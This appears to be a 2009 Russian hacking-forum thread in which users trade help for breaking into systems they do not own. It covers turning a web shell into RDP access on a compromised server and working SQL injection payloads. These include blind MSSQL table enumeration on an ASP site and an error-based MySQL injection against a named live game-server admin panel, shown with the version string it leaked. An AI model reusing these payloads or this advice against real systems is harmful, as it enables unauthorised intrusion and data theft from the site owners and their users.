28.12.2009, 01:29
|
|
Участник форума
Регистрация: 07.08.2008
Сообщений: 281
С нами:
9347610
Репутация:
165
|
|
Возможно ли подключиться к дедику по RDP имея веб шелл.?
ОС win
На все диски права админа имею
Или как добавить нового пользоателя ?
Последний раз редактировалось SeNaP; 28.12.2009 в 01:41..
|
|
|
28.12.2009, 01:50
|
|
Познавший АНТИЧАТ
Регистрация: 27.08.2007
Сообщений: 1,107
С нами:
9846041
Репутация:
1177
|
|
Сообщение от SeNaP
Возможно ли подключиться к дедику по RDP имея веб шелл.?
ОС win
На все диски права админа имею
Или как добавить нового пользоателя ?
да, можно.
как добавить, куча статей в нете. Создает BAT файл и исполняешь его. Открыть RDP - это в реестре. Так же полно статей в нете.
|
|
|
|
28.12.2009, 02:46
|
|
Постоянный
Регистрация: 18.02.2008
Сообщений: 368
С нами:
9594385
Репутация:
386
|
|
Потому что это елемент масива сервер как ты его переопределиш (в котором путь к папке где скрипты лежат ), я встречал здесь что то TOXA писал, в хедер как то можно было... но это если допустим при редиректе... что то типо такого
тынц
По линку что ты дал немного нето. Это реально, я ж это непридумал сам. Реальные примеры в багтраках встречаються. Пример из реальной жизни:
http://www.exploit-db.com/exploits/10421
в начале imagezoom.php
PHP код:
require_once($_SERVER["DOCUMENT_ROOT"]."/cms_rc_frontend.php");
......
|
|
|
|
28.12.2009, 03:36
|
|
Участник форума
Регистрация: 17.09.2006
Сообщений: 248
С нами:
10340793
Репутация:
66
|
|
так случилось такая ситуация. По GET запросу подбирал таблицы на опера типа:
commentary.asp?article=(%53elect+top+1+table_name+ from+information_schema.tables+where+table_name+no t+in+('blabla1','blabla2','blabla3',.............. ....'blabla50')
в результате помоему добился на максимальную длину символов на GET для опера. Теперь уже не принимает больше не одного имени таблицы, но нужные таблицы пока не нашлос.
Как можно обходит этого или как увеличить число символов адресной строки для Opera? |
|
|
|
28.12.2009, 12:57
|
|
Reservists Of Antichat - Level 6
Регистрация: 12.06.2008
Сообщений: 157
С нами:
9428066
Репутация:
1668
|
|
Сообщение от YuNi|[c
так случилось такая ситуация. По GET запросу подбирал таблицы на опера типа:
в результате помоему добился на максимальную длину символов на GET для опера. Теперь уже не принимает больше не одного имени таблицы, но нужные таблицы пока не нашлос.
Как можно обходит этого или как увеличить число символов адресной строки для Opera?
----------------------------------------------------
+or+1=(select+top+1+table_name+from+information_sc hema.tables+where+table_name+not+in+(select+top+ Х+table_name+from+information_schema.tables))--
----------------------------------------------------
подставляешь вместо X 1, потом 2 и т.д.
|
|
|
|
28.12.2009, 14:09
|
|
Новичок
Регистрация: 30.10.2009
Сообщений: 21
С нами:
8700457
Репутация:
24
|
|
Код:
http://wow.teletoria.ru/ACP2/index.php?modul=charedit
Не могу найти где Проделать Инъекцию ((
Код:
Notice: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ') and (`account` = 3181) and (`online` = 0) LIMIT 1' at line 1 in /var/www/html/ACP2/modules/charedit.php on line 6
Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /var/www/html/ACP2/modules/charedit.php on line 7
Вот код
PHP код:
if (mysql_num_rows($res) == 0) { echo 'Not select character!'; }
else {
$cres = mysql_fetch_array($res);
if (($cres['race'] == 1) or ($cres['race'] == 3) or ($cres['race'] == 4) or ($cres['race'] == 7) or ($cres['race'] == 11))
$char_race = 1; //Alliance
if (($cres['race'] == 2) or ($cres['race'] == 5) or ($cres['race'] == 6) or ($cres['race'] == 8) or ($cres['race'] == 10))
$char_race = 2; //Horde
$money = $cres['money'];
$char_lvl = $cres['level'];
|
|
|
|
28.12.2009, 17:18
|
|
Участник форума
Регистрация: 17.09.2006
Сообщений: 248
С нами:
10340793
Репутация:
66
|
|
Сообщение от RulleR
----------------------------------------------------
+or+1=(select+top+1+table_name+from+information_sc hema.tables+where+table_name+not+in+(select+top+Х+table_name+from+information_schema.tables))--
----------------------------------------------------
подставляешь вместо X 1, потом 2 и т.д.
спс большое очень помогло.
при запросе
PHP код:
(%53elect+top+1+Post_count+from+Total)--
всегда ответ одинаковый
ADODB.Field error '800a0bcd'
Either BOF or EOF is True, or the current record has been deleted. Requested operation requires a current record.
где может быть ошибка
Последний раз редактировалось YuNi|[c; 28.12.2009 в 22:11..
|
|
|
|
28.12.2009, 03:48
|
|
Постоянный
Регистрация: 18.02.2008
Сообщений: 368
С нами:
9594385
Репутация:
386
|
|
в результате помоему добился на максимальную длину символов на GET для опера. Теперь уже не принимает больше не одного имени таблицы, но нужные таблицы пока не нашлос.
Как можно обходит этого или как увеличить число символов адресной строки для Opera?
попробуй отсылать данные каким нить стороним софтом или скриптом, так можно будет обойти ограничение со стороны клиента
|
|
|
|
28.12.2009, 04:13
|
|
Участник форума
Регистрация: 17.09.2006
Сообщений: 248
С нами:
10340793
Репутация:
66
|
|
пробовал webscarab но оно тоже работает через браузер ((
|
|
|
|
28.12.2009, 15:57
|
|
Постоянный
Регистрация: 11.10.2007
Сообщений: 406
С нами:
9780227
Репутация:
1423
|
|
http://acp.svn.beanstalkapp.com/projects/ACP2/modules/charedit.php
PHP код:
if ($_POST['character'] >= 0) {
$c_connect = mysql_connect($c_ip, $c_userdb, $c_pw);
mysql_select_db($c_db, $c_connect);
mysql_query("SET NAMES '$encoding'");
$res = mysql_query("SELECT `name`, `class`, `guid`, `race`, `online`, `gender`, `level`, `money`, `xp` FROM `characters` WHERE (`guid` = ".$_POST['character'].") and (`account` = ".$_SESSION['user_id'].") and (`online` = 0) LIMIT 1") or trigger_error(mysql_error());
Вот здесь $_POST['character']
character=12589)+and+1=(select+*+from(select+*+fro m(select+name_const((version()),14)d)+as+t+join+(s elect+name_const((version()),14)e)b)a)--+
Notice: Duplicate column name '5.0.51a-24-log' in /var/www/html/ACP2/modules/charedit.php on line 6
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
